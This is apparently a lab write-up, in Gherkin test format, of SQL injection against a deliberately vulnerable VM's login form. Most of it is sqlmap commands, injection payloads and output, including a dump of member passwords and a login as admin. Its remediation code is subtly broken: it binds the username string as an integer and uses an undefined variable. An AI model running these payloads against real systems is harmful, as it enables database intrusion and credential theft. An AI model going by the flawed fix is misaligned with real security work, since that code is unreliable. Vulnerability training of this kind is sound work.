## Version 1.4.1
## language: en

Feature:
  TOE:
    Graceful’s VulnVM
  Category:
    SQL Injection
  Location:
    http://192.168.0.30/login.php - usermail (field)
  CWE:
    CWE-89: SQL Injection
      https://cwe.mitre.org/data/definitions/89.html
  Rule:
    REQ.173 Discard unsafe inputs
      https://fluidattacks.com/web/rules/173/
  Goal:
    Check if the site is susceptible to SQL injection
  Recommendation:
    Only use prepared statements for sanitized data

  Background:
  Hacker's software:
    | <Software name> |  <Version>     |
    | Arch Linux      | 5.7.11-arch1-1 |
    | Chrome          | 86.0.4214.2    |
    | Burp Suite      | 2020.7         |
    | Sqlmap          | 1.4.8          |

  TOE information:
    Given I am running the vulnerable VM at
    """
    192.168.0.30
    """

  Scenario: Normal use case
    Given I access the login page
    """
    http://192.168.0.30/account.php
    """
    When I enter the correct credentials and click the "Login" button
    Then I am logged with the provided user

  Scenario: Static detection
    Given I open the file "account.php"
    When I check the code, it references to "login.php"
    Then I Inspect the code in
    """
    login.php
    """
    And see the follwoing in lines 4 and 5
    """
    $sql    = "SELECT * FROM tblMembers WHERE
    username='" . $_POST['usermail'] . "';";
    $result = mysql_query($sql, $link);
    """
    And I notice that prepared statements are not used
    Then I can conclude that the query is suceptible to an SQL injection

  Scenario: Dynamic detection
    Given I want to do an SQL injection
    When I intercept the http header request with
    """
    Burp Suite
    """
    Then I get the following
    """
    POST /login.php HTTP/1.1
    Host: 192.168.0.30
    Content-Length: 45
    Cache-Control: max-age=0
    Upgrade-Insecure-Requests: 1
    Origin: http://192.168.0.30
    Content-Type: application/x-www-form-urlencoded
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36
    (KHTML, like Gecko) Chrome/84.0.4147.89 Safari/537.36
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/
    webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
    Referer: http://192.168.0.30/account.php?login=user
    Accept-Encoding: gzip, deflate
    Accept-Language: en-US,en;q=0.9
    Cookie: level=1
    Connection: close

    usermail=admin%40seattlesounds.net&password=1
    """
    And I save it in the file
    """
    http_header.txt
    """
    When I use the file with
    """
    sqlmap
    """
    Then I get the following
    """
    $ sqlmap -r http_header.txt --dbs --dbms MYSQL --level 3 --risk 3
    sqlmap identified the following injection point(s) with a total of 14437
    HTTP(s) requests:
    ---
    Parameter: usermail (POST)
      Type: boolean-based blind
      Title: AND boolean-based blind -WHERE or HAVING clause (subquery-comment)
      Payload: usermail=admin@seattlesounds.net%' AND 3601=(SELECT
      (CASE WHEN (3601=3601) THEN 3601 ELSE (SELECT 3776 UNION SELECT 8864)
      END))-- -&password=1

      Type: error-based
      Title: MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY
      clause (EXTRACTVALUE)
      Payload: usermail=admin@seattlesounds.net%' AND EXTRACTVALUE(4879,
      CONCAT(0x5c,0x716a627871,(SELECT (ELT(4879=4879,1))),0x7170707a71)) AND
      'ITuj%'='ITuj&password=1

      Type: time-based blind
      Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
      Payload: usermail=admin@seattlesounds.net%' AND (SELECT 2229 FROM
      (SELECT(SLEEP(5)))rmZV) AND 'LlWZ%'='LlWZ&password=1
    ---
    [16:47:00] [INFO] the back-end DBMS is MySQL
    back-end DBMS: MySQL >= 5.0.12 (MariaDB fork)
    [16:47:00] [INFO] fetching database names
    [16:47:00] [INFO] retrieved: 'information_schema'
    [16:47:00] [INFO] retrieved: 'mysql'
    [16:47:00] [INFO] retrieved: 'performance_schema'
    [16:47:00] [INFO] retrieved: 'seattle'
    available databases [4]:
    [*] information_schema
    [*] mysql
    [*] performance_schema
    [*] seattle

    [16:47:00] [INFO] fetched data logged to text files under
    '/.../.sqlmap/output/192.168.0.30'
    """
    And I can conclude that the query is vulnerable to SQL injection
    And I have discovered the name of the database
    """
    seattle
    """

  Scenario: Exploitation
    Given The SQL injection is possible and I know the database name
    When I execute the following command
    """
    $ sqlmap -r http_header.txt -D seattle --tables --dbms MYSQL --level 3
    --risk 3
    """
    Then I get the output
    """
    ...
    [17:00:31] [INFO] fetching tables for database: 'seattle'
    [17:00:31] [INFO] retrieved: 'tblBlogs'
    [17:00:31] [INFO] retrieved: 'tblMembers'
    [17:00:31] [INFO] retrieved: 'tblProducts'
    Database: seattle
    [3 tables]
    +-------------+
    | tblBlogs    |
    | tblMembers  |
    | tblProducts |
    +-------------+

    [17:00:31] [INFO] fetched data logged to text files under
    '/.../.sqlmap/output/192.168.0.30'

    [*] ending @ 17:00:31 /2020-08-03/
    """
    And I have probably found the table with the users
    """
    tblMembers
    """
    When I execute
    """
    $ sqlmap -r http_header.txt -D seattle -T tblMembers --columns --dbms MYSQL
    --level 3 --risk 3
    """
    Then I get
    """
    [17:06:31] [INFO] fetching columns for table 'tblMembers' in database
    'seattle'
    [17:06:31] [INFO] retrieved: 'id'
    [17:06:31] [INFO] retrieved: 'int(11)'
    [17:06:31] [INFO] retrieved: 'username'
    [17:06:31] [INFO] retrieved: 'varchar(64)'
    [17:06:31] [INFO] retrieved: 'password'
    [17:06:31] [INFO] retrieved: 'varchar(20)'
    [17:06:31] [INFO] retrieved: 'session'
    [17:06:31] [INFO] retrieved: 'varchar(32)'
    [17:06:31] [INFO] retrieved: 'name'
    [17:06:31] [INFO] retrieved: 'varchar(64)'
    [17:06:31] [INFO] retrieved: 'blog'
    [17:06:31] [INFO] retrieved: 'int(11)'
    [17:06:31] [INFO] retrieved: 'admin'
    [17:06:31] [INFO] retrieved: 'int(11)'
    Database: seattle
    Table: tblMembers
    [7 columns]
    +----------+-------------+
    | Column   | Type        |
    +----------+-------------+
    | session  | varchar(32) |
    | admin    | int(11)     |
    | blog     | int(11)     |
    | id       | int(11)     |
    | name     | varchar(64) |
    | password | varchar(20) |
    | username | varchar(64) |
    +----------+-------------+

    [17:06:31] [INFO] fetched data logged to text files under
    '/.../.sqlmap/output/192.168.0.30'

    [*] ending @ 17:06:31 /2020-08-03/
    """
    And I can see the column "password" in the users table
    When I execute
    """
    $ sqlmap.py -r http_header.txt -D seattle -T tblMembers -C password --dump
    --dbms MYSQL --level 3 --risk 3
    """
    Then I get the following output
    """
    Database: seattle
    Table: tblMembers
    [806 entries]
    +---------------------+
    | password            |
    +---------------------+
    | admin               |
    | Assasin1            |
    | foo                 |
    | foo                 |
    | ZAP                 |
    | ZAP                 |
    ...
    | ZAP                 |
    | ZAP                 |
    +---------------------+

    [17:15:13] [INFO] table 'seattle.tblMembers' dumped to CSV file
    '/.../.sqlmap/output/192.168.0.30/dump/seattle/tblMembers.csv'
    [17:15:13] [INFO] fetched data logged to text files under
    '/../.sqlmap/output/192.168.0.30'

    [*] ending @ 17:15:13 /2020-08-03/
    """
    And I have found some passwords
    When I click in a blog link
    """
    http://192.168.0.30/blog.php?author=1
    """
    Then I can see that the message
    """
    Viewing all posts by Admin (admin@seattlesounds.net)
    """
    And I conclude the mail for admin is
    """
    admin@seattlesounds.net
    """
    When I try to log in with the credentials
    """
    admin@seattlesounds.net and admin
    """
    Then I get the message
    """
    Invalid password, please try again.
    """
    When I try to log in with the credentials
    """
    admin@seattlesounds.net and Assasin1
    """
    Then I get logged in as admin (evidence)[evidence.png]

  Scenario: Remediation
    Given The site has a vulnerable query against SQL injection in
    """
    login.php
    """
    When The site is not sanitazing input data using prepared statements
    Then I change the code in lines 4 and 5 to
    """
    $q1 = $mysqli->prepare("SELECT * FROM tblMembers WHERE
    username=? LIMIT 0,1");
    $q1->bind_param("i", $username);
    $q1->execute();
    $q1->close();
    """
    Given this new code, now the SQL statements are prepared
    When the "usermail" parameter is transmited to the Database
    Then it does not need to be correctly escaped
    And That is because, it will be transmited using a diferent protocol
    And a little later than the prepared statement, that works as a template
    Then the SQL query is no longer susceptible to SQL injections

  Scenario: Scoring
  Severity scoring according to CVSSv3 standard
  Base: Attributes that are constants over time and organizations
    8.6/10 (High) - AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:L/A:L
  Temporal: Attributes that measure the exploit's popularity and fixability
    8.2/10 (High) - E:H/RL:O/RC:C
  Environmental: Unique and relevant attributes to a specific user environment
    8.0/10 (High) - CR:M/IR:M/AR:L/MAV:N/MAC:L/MPR:N/MUI:N/MS:U/MC:H/MI:L/MA:L
  Scenario: Correlations
    No correlations have been found to this date 2020-08-04
